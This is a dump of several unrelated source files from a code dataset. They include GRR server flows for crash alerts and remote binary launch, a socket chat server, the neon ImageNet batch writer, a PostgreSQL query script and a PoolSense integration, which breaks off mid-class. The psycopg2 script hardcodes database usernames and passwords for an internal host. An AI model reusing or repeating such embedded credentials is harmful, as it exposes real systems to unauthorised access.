\n\n\"\"\"\n\n subject = \"GRR nanny message received from %s.\"\n\n logline = \"Nanny for client %s sent: %s\"\n\n @flow.EventHandler(allow_client_access=True)\n def ProcessMessage(self, message=None, event=None):\n \"\"\"Processes this event.\"\"\"\n _ = event\n\n client_id = message.source\n\n message = rdfvalue.DataBlob(message.args).string\n\n logging.info(self.logline, client_id, message)\n\n # Write crash data to AFF4.\n client = aff4.FACTORY.Open(client_id, token=self.token)\n client_info = client.Get(client.Schema.CLIENT_INFO)\n\n crash_details = rdfvalue.ClientCrash(\n client_id=client_id, client_info=client_info,\n crash_message=message, timestamp=long(time.time() * 1e6),\n crash_type=self.well_known_session_id)\n\n self.WriteAllCrashDetails(client_id, crash_details)\n\n # Also send email.\n if config_lib.CONFIG[\"Monitoring.alert_email\"]:\n client = aff4.FACTORY.Open(client_id, token=self.token)\n hostname = client.Get(client.Schema.HOSTNAME)\n url = urllib.urlencode(((\"c\", client_id),\n (\"main\", \"HostInformation\")))\n\n email_alerts.SendEmail(\n config_lib.CONFIG[\"Monitoring.alert_email\"],\n \"GRR server\",\n self.subject % client_id,\n self.mail_template % dict(\n client_id=client_id,\n admin_ui=config_lib.CONFIG[\"AdminUI.url\"],\n hostname=hostname,\n signature=config_lib.CONFIG[\"Email.signature\"],\n urn=url,\n message=message),\n is_html=True)\n\n\nclass ClientAlertHandler(NannyMessageHandler):\n \"\"\"A listener for client messages.\"\"\"\n EVENTS = [\"ClientAlert\"]\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:ClientAlert\")\n\n mail_template = \"\"\"\n

GRR client message received.

\n\nThe client %(client_id)s (%(hostname)s) just sent a message:
\n
\n%(message)s\n
\nClick here to access this machine.\n\n

%(signature)s

\n\n\"\"\"\n\n subject = \"GRR client message received from %s.\"\n\n logline = \"Client message from %s: %s\"\n\n\nclass ClientCrashHandler(ClientCrashEventListener):\n \"\"\"A listener for client crashes.\"\"\"\n EVENTS = [\"ClientCrash\"]\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:CrashHandler\")\n\n mail_template = \"\"\"\n

GRR client crash report.

\n\nClient %(client_id)s (%(hostname)s) just crashed while executing an action.\nClick here to access this machine.\n\n

Thanks,

\n

%(signature)s

\n

\nP.S. The state of the failing flow was:\n%(state)s\n\n%(nanny_msg)s\n\n\"\"\"\n\n @flow.EventHandler(allow_client_access=True)\n def ProcessMessage(self, message=None, event=None):\n \"\"\"Processes this event.\"\"\"\n _ = event\n client_id = message.source\n nanny_msg = \"\"\n\n flow_obj = aff4.FACTORY.Open(message.session_id, token=self.token)\n\n # Log.\n logging.info(\"Client crash reported, client %s.\", client_id)\n\n # Export.\n stats.STATS.IncrementCounter(\"grr_client_crashes\")\n\n # Write crash data to AFF4.\n client = aff4.FACTORY.Open(client_id, token=self.token)\n client_info = client.Get(client.Schema.CLIENT_INFO)\n\n status = rdfvalue.GrrStatus(message.args)\n crash_details = rdfvalue.ClientCrash(\n client_id=client_id, session_id=message.session_id,\n client_info=client_info, crash_message=status.error_message,\n timestamp=rdfvalue.RDFDatetime().Now(),\n crash_type=self.well_known_session_id)\n\n self.WriteAllCrashDetails(client_id, crash_details,\n flow_session_id=message.session_id)\n\n # Also send email.\n if config_lib.CONFIG[\"Monitoring.alert_email\"]:\n if status.nanny_status:\n nanny_msg = \"Nanny status: %s\" % status.nanny_status\n\n client = aff4.FACTORY.Open(client_id, token=self.token)\n hostname = client.Get(client.Schema.HOSTNAME)\n url = urllib.urlencode(((\"c\", client_id),\n (\"main\", \"HostInformation\")))\n\n renderer = rendering.FindRendererForObject(flow_obj.state)\n\n email_alerts.SendEmail(\n config_lib.CONFIG[\"Monitoring.alert_email\"],\n \"GRR server\",\n \"Client %s reported a crash.\" % client_id,\n self.mail_template % dict(\n client_id=client_id,\n admin_ui=config_lib.CONFIG[\"AdminUI.url\"],\n hostname=hostname,\n state=renderer.RawHTML(),\n urn=url,\n nanny_msg=nanny_msg,\n signature=config_lib.CONFIG[\"Email.signature\"]\n ),\n is_html=True)\n\n if nanny_msg:\n msg = \"Client crashed, \" + nanny_msg\n else:\n msg = \"Client crashed.\"\n\n # Now terminate the flow.\n flow.GRRFlow.TerminateFlow(message.session_id, reason=msg,\n token=self.token, force=True)\n\n\nclass ClientStartupHandler(flow.EventListener):\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:Startup\")\n\n @flow.EventHandler(allow_client_access=True, auth_required=False)\n def ProcessMessage(self, message=None, event=None):\n \"\"\"Handle a startup event.\"\"\"\n _ = event\n # We accept unauthenticated messages so there are no errors but we don't\n # store the results.\n if (message.auth_state !=\n rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED):\n return\n\n client_id = message.source\n\n client = aff4.FACTORY.Create(client_id, \"VFSGRRClient\", mode=\"rw\",\n token=self.token)\n old_info = client.Get(client.Schema.CLIENT_INFO)\n old_boot = client.Get(client.Schema.LAST_BOOT_TIME, 0)\n startup_info = rdfvalue.StartupInfo(message.args)\n info = startup_info.client_info\n\n # Only write to the datastore if we have new information.\n new_data = (info.client_name, info.client_version, info.revision,\n info.build_time, info.client_description)\n old_data = (old_info.client_name, old_info.client_version,\n old_info.revision, old_info.build_time,\n old_info.client_description)\n\n if new_data != old_data:\n client.Set(client.Schema.CLIENT_INFO(info))\n\n client.AddLabels(*info.labels, owner=\"GRR\")\n\n # Allow for some drift in the boot times (5 minutes).\n if abs(int(old_boot) - int(startup_info.boot_time)) > 300 * 1e6:\n client.Set(client.Schema.LAST_BOOT_TIME(startup_info.boot_time))\n\n client.Close()\n\n flow.Events.PublishEventInline(\"ClientStartup\", message, token=self.token)\n\n\nclass IgnoreResponses(flow.WellKnownFlow):\n \"\"\"This flow exists so other well known flows can delegate their responses.\"\"\"\n\n category = None\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:DevNull\")\n\n def ProcessMessage(self, message):\n pass\n\n\nclass KeepAliveArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.KeepAliveArgs\n\n\nclass KeepAlive(flow.GRRFlow):\n \"\"\"Requests that the clients stays alive for a period of time.\"\"\"\n\n # We already want to run this flow while waiting for a client approval.\n # Note that this can potentially be abused to launch a DDOS attack against\n # the frontend server(s) by putting all clients into fastpoll mode. The load\n # of idle polling messages is not that high though and this can only be done\n # by users that have a GRR account already so the risk is acceptable.\n ACL_ENFORCED = False\n\n category = \"/Administrative/\"\n behaviours = flow.GRRFlow.behaviours + \"BASIC\"\n\n sleep_time = 60\n args_type = KeepAliveArgs\n\n @flow.StateHandler(next_state=\"SendMessage\")\n def Start(self):\n self.state.Register(\"end_time\", self.args.duration.Expiry())\n self.CallState(next_state=\"SendMessage\")\n\n @flow.StateHandler(next_state=\"Sleep\")\n def SendMessage(self, responses):\n if not responses.success:\n self.Log(responses.status.error_message)\n raise flow.FlowError(responses.status.error_message)\n\n self.CallClient(\"Echo\", data=\"Wake up!\", next_state=\"Sleep\")\n\n @flow.StateHandler(next_state=\"SendMessage\")\n def Sleep(self, responses):\n if not responses.success:\n self.Log(responses.status.error_message)\n raise flow.FlowError(responses.status.error_message)\n\n if rdfvalue.RDFDatetime().Now() < self.state.end_time - self.sleep_time:\n start_time = rdfvalue.RDFDatetime().Now() + self.sleep_time\n self.CallState(next_state=\"SendMessage\", start_time=start_time)\n\n\nclass TerminateFlowArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.TerminateFlowArgs\n\n\nclass TerminateFlow(flow.GRRFlow):\n \"\"\"Terminate a flow with a given URN.\"\"\"\n # This flow can run on any client without ACL enforcement (an SUID flow).\n ACL_ENFORCED = False\n args_type = TerminateFlowArgs\n\n @flow.StateHandler()\n def Start(self):\n \"\"\"Terminate a flow. User has to have access to the flow.\"\"\"\n # We have to create special token here, because within the flow\n # token has supervisor access.\n check_token = access_control.ACLToken(username=self.token.username,\n reason=self.token.reason)\n # If we can read the flow, we're allowed to terminate it.\n data_store.DB.security_manager.CheckDataStoreAccess(\n check_token, [self.args.flow_urn], \"r\")\n\n flow.GRRFlow.TerminateFlow(self.args.flow_urn,\n reason=self.args.reason,\n token=self.token, force=True)\n\n\nclass LaunchBinaryArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.LaunchBinaryArgs\n\n\nclass LaunchBinary(flow.GRRFlow):\n \"\"\"Launch a signed binary on a client.\"\"\"\n\n category = \"/Administrative/\"\n\n AUTHORIZED_LABELS = [\"admin\"]\n args_type = LaunchBinaryArgs\n\n @flow.StateHandler(next_state=[\"End\"])\n def Start(self):\n fd = aff4.FACTORY.Open(self.args.binary, token=self.token)\n if not isinstance(fd, collections.GRRSignedBlob):\n raise RuntimeError(\"Executable binary %s not found.\" % self.args.binary)\n\n offset = 0\n write_path = \"%d\" % time.time()\n for i, blob in enumerate(fd):\n self.CallClient(\n \"ExecuteBinaryCommand\", executable=blob, more_data=i < fd.chunks-1,\n args=shlex.split(self.args.command_line), offset=offset,\n write_path=write_path, next_state=\"End\")\n\n offset += len(blob.data)\n\n def _TruncateResult(self, data):\n if len(data) > 2000:\n result = data[:2000] + \"... [truncated]\"\n else:\n result = data\n\n return result\n\n @flow.StateHandler()\n def End(self, responses):\n if not responses.success:\n raise IOError(responses.status)\n\n response = responses.First()\n if response:\n self.Log(\"Stdout: %s\" % self._TruncateResult(response.stdout))\n self.Log(\"Stderr: %s\" % self._TruncateResult(response.stderr))\n\n self.SendReply(response)\n\n\nclass RunReportFlowArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.RunReportFlowArgs\n\n\nclass RunReport(flow.GRRGlobalFlow):\n \"\"\"Run a report and send the result via email.\"\"\"\n\n category = \"/Reporting/\"\n\n args_type = RunReportFlowArgs\n behaviours = flow.GRRGlobalFlow.behaviours + \"BASIC\"\n\n ACL_ENFORCED = False\n\n # Only admins are allows to run reports.\n AUTHORIZED_LABELS = [\"admin\"]\n\n @flow.StateHandler(next_state=\"RunReport\")\n def Start(self):\n if self.state.args.report_name not in reports.Report.classes:\n raise flow.FlowError(\"No such report %s\" % self.state.args.report_name)\n else:\n self.CallState(next_state=\"RunReport\")\n\n @flow.StateHandler(next_state=\"EmailReport\")\n def RunReport(self):\n \"\"\"Run the report.\"\"\"\n report_cls = reports.Report.GetPlugin(self.state.args.report_name)\n report_obj = report_cls(token=self.token)\n report_obj.Run()\n report_obj.MailReport(self.state.args.email)\n\n\nclass ApplyLabelsToClientsFlowArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.ApplyLabelsToClientsFlowArgs\n\n\nclass ApplyLabelsToClientsFlow(flow.GRRGlobalFlow):\n\n args_type = ApplyLabelsToClientsFlowArgs\n\n ACL_ENFORCED = False\n\n @flow.StateHandler()\n def Start(self):\n audit_description = \",\".join([self.token.username + \".\" + name\n for name in self.args.labels])\n audit_events = []\n try:\n client_objs = aff4.FACTORY.MultiOpen(\n self.args.clients, aff4_type=\"VFSGRRClient\", mode=\"rw\",\n token=self.token)\n for client_obj in client_objs:\n client_obj.AddLabels(*self.args.labels)\n client_obj.Close()\n\n audit_events.append(\n rdfvalue.AuditEvent(user=self.token.username,\n action=\"CLIENT_ADD_LABEL\",\n flow_name=\"ApplyLabelsToClientsFlow\",\n client=client_obj.urn,\n description=audit_description))\n finally:\n flow.Events.PublishMultipleEvents({\"Audit\": audit_events},\n token=self.token)\n","repo_name":"ForensicTools/GRREAT-475_2141-Chaigon-Failey-Siebert","sub_path":"lib/flows/general/administrative.py","file_name":"administrative.py","file_ext":"py","file_size_in_byte":29876,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"41425979479","text":"\nimport socket\n\nmyFirstSocket = socket.socket()\nmyFirstSocket.bind((\"\", 50000))\nmyFirstSocket.listen(1)\n\nwhile True:\n clientSocket, clientAdres = myFirstSocket.accept()\n messageSend = input(\"Введите сообщение: \")\n if messageSend == 'by by':\n break\n clientSocket.sendall(messageSend.encode(encoding=\"utf-8\"))\n\n while True:\n data = clientSocket.recv(1024)\n receivedMsg = data.decode(encoding=\"utf-8\")\n print(receivedMsg)\n\n\nclientSocket.close() \n\n\n","repo_name":"Allex413/homeNetwork1","sub_path":"HomeWork_Network1/homeServer.py","file_name":"homeServer.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"24173814964","text":"import logging\n\nimport argparse as argp\nimport functools\nfrom glob import glob\nimport gzip\nimport imgworker\nfrom multiprocessing import Pool\nimport numpy as np\nimport os\nimport sys\nimport tarfile\nfrom time import time\nimport yaml\n\nfrom neon.util.compat import range, StringIO\nfrom neon.util.param import opt_param\nfrom neon.util.persist import serialize\n\nTARGET_SIZE = None\nSQUARE_CROP = True\n\nlogger = logging.getLogger(__name__)\n\n\n# NOTE: We have to leave this helper function out of the class and use the\n# global variable hack so that we can use multiprocess pool.map\ndef proc_img(imgfile, is_string=False):\n from PIL import Image\n if is_string:\n imgfile = StringIO(imgfile)\n im = Image.open(imgfile)\n\n # This part does the processing\n scale_factor = TARGET_SIZE / np.float32(min(im.size))\n (wnew, hnew) = map(lambda x: int(round(scale_factor * x)), im.size)\n if scale_factor != 1:\n filt = Image.BICUBIC if scale_factor > 1 else Image.ANTIALIAS\n im = im.resize((wnew, hnew), filt)\n\n if SQUARE_CROP is True:\n (cx, cy) = map(lambda x: (x - TARGET_SIZE) / 2, (wnew, hnew))\n im = im.crop((cx, cy, cx+TARGET_SIZE, cy+TARGET_SIZE))\n\n buf = StringIO()\n im.save(buf, format='JPEG')\n return buf.getvalue()\n\n\nclass BatchWriter(object):\n\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n self.out_dir = os.path.expanduser(self.save_dir)\n self.in_dir = os.path.expanduser(self.image_dir)\n self.batch_size = self.macro_size\n global TARGET_SIZE, SQUARE_CROP\n TARGET_SIZE = self.output_image_size\n SQUARE_CROP = self.square_crop\n opt_param(self, ['file_pattern'], '*.jpg')\n opt_param(self, ['validation_pct'], 0.2)\n opt_param(self, ['num_workers'], 5)\n opt_param(self, ['class_samples_max'])\n self.train_file = os.path.join(self.out_dir, 'train_file.csv.gz')\n self.val_file = os.path.join(self.out_dir, 'val_file.csv.gz')\n self.stats = os.path.join(self.out_dir, 'dataset_cache.pkl')\n self.val_mean = np.zeros((self.output_image_size,\n self.output_image_size,\n self.num_channels), dtype=np.uint8)\n self.train_mean = np.zeros((self.output_image_size,\n self.output_image_size,\n self.num_channels), dtype=np.uint8)\n\n def __str__(self):\n pairs = map(lambda a: a[0] + ': ' + a[1],\n zip(self.__dict__.keys(),\n map(str, self.__dict__.values())))\n return \"\\n\".join(pairs)\n\n def write_csv_files(self):\n # Get the labels as the subdirs\n subdirs = glob(os.path.join(self.in_dir, '*'))\n labels = sorted(map(lambda x: os.path.basename(x), subdirs))\n indexes = range(len(labels))\n self.labels_dict = {k: v for k, v in zip(labels, indexes)}\n\n tlines = []\n vlines = []\n for subdir in subdirs:\n subdir_label = self.labels_dict[os.path.basename(subdir)]\n files = glob(os.path.join(subdir, self.file_pattern))\n np.random.shuffle(files)\n if self.class_samples_max is not None:\n files = files[:self.class_samples_max]\n lines = [(filename, subdir_label) for filename in files]\n v_idx = int(self.validation_pct * len(lines))\n tlines += lines[v_idx:]\n vlines += lines[:v_idx]\n\n np.random.shuffle(tlines)\n np.random.shuffle(vlines)\n\n if not os.path.exists(self.out_dir):\n os.makedirs(self.out_dir)\n\n for ff, ll in zip([self.train_file, self.val_file], [tlines, vlines]):\n with gzip.open(ff, 'wb') as f:\n f.write('filename,l_id\\n')\n for tup in ll:\n f.write('{},{}\\n'.format(*tup))\n f.close()\n\n # Write out cached stats for this data\n self.ntrain = (len(tlines) + self.batch_size - 1) / self.batch_size\n self.train_nrec = len(tlines)\n self.nval = (len(vlines) + self.batch_size - 1) / self.batch_size\n self.val_nrec = len(vlines)\n self.train_start = 0\n self.val_start = 10 ** int(np.log10(self.ntrain * 10))\n\n def parse_file_list(self, infile):\n import pandas as pd\n compression = 'gzip' if infile.endswith('.gz') else None\n df = pd.read_csv(infile, compression=compression)\n\n lk = filter(lambda x: x.startswith('l'), df.keys())\n tk = filter(lambda x: x.startswith('t'), df.keys())\n\n labels = {ll: np.array(df[ll].values, np.int32) for ll in lk}\n targets = np.array(df[tk].values, np.float32) if len(tk) > 0 else None\n imfiles = df['filename'].values\n\n self.nclass = {ll: (max(df[ll].values) + 1) for ll in lk}\n return imfiles, labels, targets\n\n def write_batches(self, name, start, labels, imfiles, targets=None,\n is_tar=False):\n pool = Pool(processes=self.num_workers)\n psz = self.batch_size\n osz = self.output_image_size\n npts = (len(imfiles) + psz - 1) / psz\n\n imfiles = [imfiles[i*psz: (i+1)*psz] for i in range(npts)]\n\n if targets is not None:\n targets = [targets[i*psz: (i+1)*psz].T.copy() for i in range(npts)]\n\n labels = [{k: v[i*psz: (i+1)*psz] for k, v in labels.iteritems()}\n for i in range(npts)]\n\n accum_buf = np.zeros((osz, osz, self.num_channels), dtype=np.int32)\n batch_mean = np.zeros(accum_buf.shape, dtype=np.uint8)\n logger.info(\"Writing %s batches...\", name)\n for i, jpeg_file_batch in enumerate(imfiles):\n t = time()\n if is_tar:\n jpeg_file_batch = [j.read() for j in jpeg_file_batch]\n jpeg_strings = pool.map(\n functools.partial(proc_img, is_string=is_tar), jpeg_file_batch)\n targets_batch = None if targets is None else targets[i]\n labels_batch = labels[i]\n bfile = os.path.join(self.out_dir, 'data_batch_%d' % (start + i))\n serialize({'data': jpeg_strings,\n 'labels': labels_batch,\n 'targets': targets_batch},\n bfile)\n logger.info(\"Wrote to %s (%s batch %d of %d) (%.2f sec)\",\n self.out_dir, name, i + 1, len(imfiles), time() - t)\n\n # get the means and accumulate\n imgworker.calc_batch_mean(jpglist=jpeg_strings, tgt=batch_mean,\n orig_size=osz, rgb=self.rgb,\n nthreads=self.num_workers)\n\n # scale for the case where we have an undersized batch\n if len(jpeg_strings) < self.batch_size:\n batch_mean *= len(jpeg_strings) / self.batch_size\n accum_buf += batch_mean\n pool.close()\n mean_buf = self.train_mean if name == 'train' else self.val_mean\n mean_buf[:] = accum_buf / len(imfiles)\n\n def save_meta(self):\n serialize({'ntrain': self.ntrain,\n 'nval': self.nval,\n 'train_start': self.train_start,\n 'val_start': self.val_start,\n 'macro_size': self.batch_size,\n 'train_mean': self.train_mean,\n 'val_mean': self.val_mean,\n 'labels_dict': self.labels_dict,\n 'val_nrec': self.val_nrec,\n 'train_nrec': self.train_nrec,\n 'nclass': self.nclass}, self.stats)\n\n def run(self):\n self.write_csv_files()\n namelist = ['train', 'validation']\n filelist = [self.train_file, self.val_file]\n startlist = [self.train_start, self.val_start]\n for sname, fname, start in zip(namelist, filelist, startlist):\n logger.info(\"%s %s %s\", sname, fname, start)\n if fname is not None and os.path.exists(fname):\n imgs, labels, targets = self.parse_file_list(fname)\n self.write_batches(sname, start, labels, imgs, targets)\n else:\n logger.info('Skipping %s, file missing', sname)\n self.save_meta()\n\n\nclass BatchWriterImagenet(BatchWriter):\n\n # code below adapted from Alex Krizhevsky's cuda-convnet2 library,\n # make-data.py\n # Copyright 2014 Google Inc. All rights reserved.\n #\n # Licensed under the Apache License, Version 2.0 (the \"License\");\n # you may not use this file except in compliance with the License.\n # You may obtain a copy of the License at\n #\n # http://www.apache.org/licenses/LICENSE-2.0\n #\n # Unless required by applicable law or agreed to in writing, software\n # distributed under the License is distributed on an \"AS IS\" BASIS,\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n # See the License for the specific language governing permissions and\n # limitations under the License.\n ##########################################################################\n\n def run(self):\n bsz = self.batch_size\n\n load_dir = self.in_dir\n # load_dir = os.path.join(os.path.expandvars(\n # os.path.expanduser(self.in_dir)), 'I1K')\n train_tar = os.path.join(load_dir, 'ILSVRC2012_img_train.tar')\n validation_tar = os.path.join(load_dir, 'ILSVRC2012_img_val.tar')\n devkit_tar = os.path.join(load_dir, 'ILSVRC2012_devkit_t12.tar.gz')\n self.url = \"http://www.image-net.org/download-imageurls\"\n for infile in (train_tar, validation_tar, devkit_tar):\n if not os.path.exists(infile):\n raise IOError(infile + \" not found. Please ensure you have\"\n \"ImageNet downloaded. More info here: \" +\n self.url)\n labels_dict, label_names, val_labels = self.parse_dev_meta(devkit_tar)\n self.labels_dict = labels_dict\n np.random.seed(0)\n with self.open_tar(train_tar, 'training tar') as tf:\n s_sets = tf.getmembers()\n s_tars = [tarfile.open(fileobj=tf.extractfile(s)) for s in s_sets]\n\n logger.info(\"Loaded synset tars.\")\n logger.info('Building trainset list ( can take a while)...')\n\n t_jpegfiles = []\n for i, st in enumerate(s_tars):\n if i % 100 == 0:\n pct_done = int(round((100.0 * i) / len(s_tars)))\n logger.info(\"%d%% ...\", pct_done)\n t_jpegfiles += [st.extractfile(m) for m in st.getmembers()]\n st.close()\n\n np.random.shuffle(t_jpegfiles)\n train_labels = [[labels_dict[j.name[:9]]] for j in t_jpegfiles]\n num_train_files = len(t_jpegfiles)\n logger.info(\"created list of jpg files\")\n logger.info(\"Number of training files = %d\", num_train_files)\n\n self.ntrain = (num_train_files + bsz - 1) / bsz\n self.train_nrec = num_train_files\n self.nclass = {'l_id': 1000}\n self.train_start = 0\n train_labels = {'l_id': np.array(train_labels, dtype=np.int32)}\n self.write_batches('train', self.train_start, train_labels,\n t_jpegfiles, targets=None, is_tar=True)\n\n with self.open_tar(validation_tar, 'validation tar') as tf:\n v_jpegfiles = sorted([tf.extractfile(m) for m in tf.getmembers()],\n key=lambda x: x.name)\n num_val_files = len(v_jpegfiles)\n\n self.nval = (num_val_files + bsz - 1) / bsz\n self.val_nrec = num_val_files\n self.val_start = 10 ** int(np.log10(self.ntrain) + 1)\n val_labels = {'l_id': np.array(val_labels, dtype=np.int32)}\n self.write_batches('validation', self.val_start, val_labels,\n v_jpegfiles, targets=None, is_tar=True)\n self.save_meta()\n\n def open_tar(self, path, name):\n if not os.path.exists(path):\n logger.error(\"ILSVRC 2012 %s not found at %s.\",\n \"Make sure to set ILSVRC_SRC_DIR correctly at the\",\n \"top of this file (%s).\" % (name, path, sys.argv[0]))\n sys.exit(1)\n return tarfile.open(path)\n\n def parse_dev_meta(self, ilsvrc_devkit_tar):\n tf = self.open_tar(ilsvrc_devkit_tar, 'devkit tar')\n fmeta = tf.extractfile(\n tf.getmember('ILSVRC2012_devkit_t12/data/meta.mat'))\n import scipy.io\n meta_mat = scipy.io.loadmat(StringIO(fmeta.read()))\n labels_dic = dict(\n (m[0][1][0], m[0][0][0][0] - 1) for m in meta_mat['synsets']\n if m[0][0][0][0] >= 1 and m[0][0][0][0] <= 1000)\n label_names_dic = dict(\n (m[0][1][0], m[0][2][0]) for m in meta_mat['synsets']\n if (m[0][0][0][0] >= 1 and m[0][0][0][0] <= 1000))\n label_names = [tup[1] for tup in sorted(\n [(v, label_names_dic[k]) for k, v in labels_dic.items()],\n key=lambda x:x[0])]\n\n fvgtruth = tf.extractfile(tf.getmember(\n 'ILSVRC2012_devkit_t12/data/' +\n 'ILSVRC2012_validation_ground_truth.txt'))\n vgtruth = [[int(line.strip()) - 1] for line in fvgtruth.readlines()]\n tf.close()\n return labels_dic, label_names, vgtruth\n\n\nif __name__ == \"__main__\":\n parser = argp.ArgumentParser()\n parser.add_argument('--config', help='Configuration File', required=True)\n parser.add_argument('--dataset', help='Dataset name', required=True)\n\n args = parser.parse_args()\n with open(args.config) as f:\n ycfg = yaml.load(f)[args.dataset]\n bw = BatchWriterImagenet(**ycfg)\n bw.run()\n","repo_name":"ominux/neon","sub_path":"neon/util/batch_writer.py","file_name":"batch_writer.py","file_ext":"py","file_size_in_byte":13785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"4"} +{"seq_id":"13818068233","text":"import psycopg2\n\n# # Settings for Alpha\n# HOST = \"tklid-monit0001.vm.mos.cloud.sbrf.ru\"\n# PORT = \"5433\"\n# DB_NAME = \"aiadviserdb\"\n# USER_1 = \"aiadviser_admin\"\n# PASSWORD_1 = \"aiadviser0TEST$Admin123\"\n# USER_2 = \"aiadviser\"\n# PASSWORD_2 = \"aiadviser0TEST$User123\"\n# USER = USER_1\n# PASSWORD = PASSWORD_1\n\n# Settings for test\nHOST = \"127.0.0.1\"\nPORT = \"5433\"\nDB_NAME = \"translation_memory_large\"\nUSER = \"postgres\"\nPASSWORD = \"100542\"\n\n\nconn = psycopg2.connect(\n user=USER,\n password=PASSWORD,\n host=HOST,\n port=PORT,\n database=DB_NAME\n)\n\ncursor = conn.cursor()\ntry:\n query_1 = \"\"\"\n SELECT table_name\n FROM information_schema.tables\n WHERE table_schema = 'public'\n ORDER BY table_name;\n \"\"\"\n cursor.execute(query_1)\n print('Done')\n records = cursor.fetchall()\n print(records)\n\n query_2 = \"\"\"\n SELECT *\n FROM cat_tmgroup\n \"\"\"\n cursor.execute(query_2)\n print('Done')\n records = cursor.fetchall()\n print(records)\n\n query_3 = \"\"\"\n SELECT \n table_name, \n column_name, \n data_type \n FROM \n information_schema.columns\n WHERE \n table_name = 'cat_tmgroup';\n \"\"\"\n cursor.execute(query_3)\n print('Done')\n records = cursor.fetchall()\n print(records)\n\n last_update = f\"to_timestamp('16-05-2011 15:36:38', 'dd-mm-yyyy hh24:mi:ss')\"\n query_4 = f\"\"\"\n SELECT cat_tmgroup.id, cat_tmgroup.updated_at, cat_sourceunit.text AS source, cat_translationunit.text AS translation \n FROM cat_tmunit \n INNER JOIN cat_translationunit \n ON cat_translationunit.id=cat_tmunit.translation_unit_id \n INNER JOIN cat_sourceunit \n ON cat_sourceunit.id=cat_tmunit.source_unit_id \n INNER JOIN cat_tmgroup \n ON cat_tmgroup.id=cat_tmunit.tm_group_id \n WHERE cat_tmunit.language_id IN (20, 72) AND cat_tmgroup.updated_at > {last_update};\n \"\"\"\n # query_4 = f\"\"\"\n # SELECT cat_tmunit.tm_group_id , cat_sourceunit.text AS source, cat_translationunit.text AS translation\n # FROM cat_tmunit\n # INNER JOIN cat_translationunit\n # ON cat_translationunit.id=cat_tmunit.translation_unit_id\n # INNER JOIN cat_sourceunit\n # ON cat_sourceunit.id=cat_tmunit.source_unit_id\n # \"\"\"\n cursor.execute(query_4)\n print('Done main')\n records = cursor.fetchall()\n print(records[:3])\n\n # query_5 = f\"\"\"\n # SELECT *\n # FROM cat_tmgroup\n # \"\"\"\n # cursor.execute(query_5)\n # print('Done 5')\n # records = cursor.fetchall()\n # print(records)\nexcept:\n print('Some problems')\nfinally:\n cursor.close()\n conn.close()\n\n\n","repo_name":"dmi3eva/katyas_zone","sub_path":"db/check_psycorpg.py","file_name":"check_psycorpg.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"22983083779","text":"# 7 time() 함수 써서 지금 몇시몇분인지 구하기\n\nimport time # time 모듈 불러와서 time() 쓸 수 있게 하기\n# time()은 1970 01 01 이후 흘러온 전체 초를 반환함\nfseconds = time.time() # 이 값은 float이다\n\n# 현재 시각은 24시, 60분을 넘겨 표시할 수 없음\nnowhrs = int((fseconds//(60*60))%24)\nif nowhrs > 12: # 12시간 표기 형식\n nowhrs -= 12\n nowhrs = \"오후 \" + str(nowhrs)\nelif nowhrs == 12:\n nowhrs = \"오후 \" + str(nowhrs)\nelif nowhrs < 12:\n nowhrs = \"오전 \" + str(nowhrs)\n \nnowmnts = int((fseconds//60)%60)\n\nprint(\"현재 시각(GMT):\", nowhrs+\"시\", str(nowmnts)+\"분\")\n","repo_name":"cuberisu/Practice","sub_path":"practice_3-7.py","file_name":"practice_3-7.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"75249326515","text":"\"\"\"The PoolSense integration.\"\"\"\nfrom datetime import timedelta\nimport logging\n\nimport async_timeout\nfrom poolsense import PoolSense\nfrom poolsense.exceptions import PoolSenseError\n\nfrom openpeerpower.config_entries import ConfigEntry\nfrom openpeerpower.const import CONF_EMAIL, CONF_PASSWORD\nfrom openpeerpower.core import OpenPeerPower\nfrom openpeerpower.helpers import aiohttp_client\nfrom openpeerpower.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n UpdateFailed,\n)\n\nfrom .const import DOMAIN\n\nPLATFORMS = [\"sensor\", \"binary_sensor\"]\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(opp: OpenPeerPower, entry: ConfigEntry):\n \"\"\"Set up PoolSense from a config entry.\"\"\"\n\n poolsense = PoolSense(\n aiohttp_client.async_get_clientsession(opp),\n entry.data[CONF_EMAIL],\n entry.data[CONF_PASSWORD],\n )\n auth_valid = await poolsense.test_poolsense_credentials()\n\n if not auth_valid:\n _LOGGER.error(\"Invalid authentication\")\n return False\n\n coordinator = PoolSenseDataUpdateCoordinator(opp, entry)\n\n await coordinator.async_config_entry_first_refresh()\n\n opp.data.setdefault(DOMAIN, {})\n opp.data[DOMAIN][entry.entry_id] = coordinator\n\n opp.config_entries.async_setup_platforms(entry, PLATFORMS)\n\n return True\n\n\nasync def async_unload_entry(opp: OpenPeerPower, entry: ConfigEntry):\n \"\"\"Unload a config entry.\"\"\"\n unload_ok = await opp.config_entries.async_unload_platforms(entry, PLATFORMS)\n if unload_ok:\n opp.data[DOMAIN].pop(entry.entry_id)\n return unload_ok\n\n\nclass PoolSenseEntity(CoordinatorEntity):\n \"\"\"Implements a common class elements representing the PoolSense component.\"\"\"\n\n def __init__(self, coordinator, email, info_type):\n \"\"\"Initialize poolsense sensor.\"\"\"\n 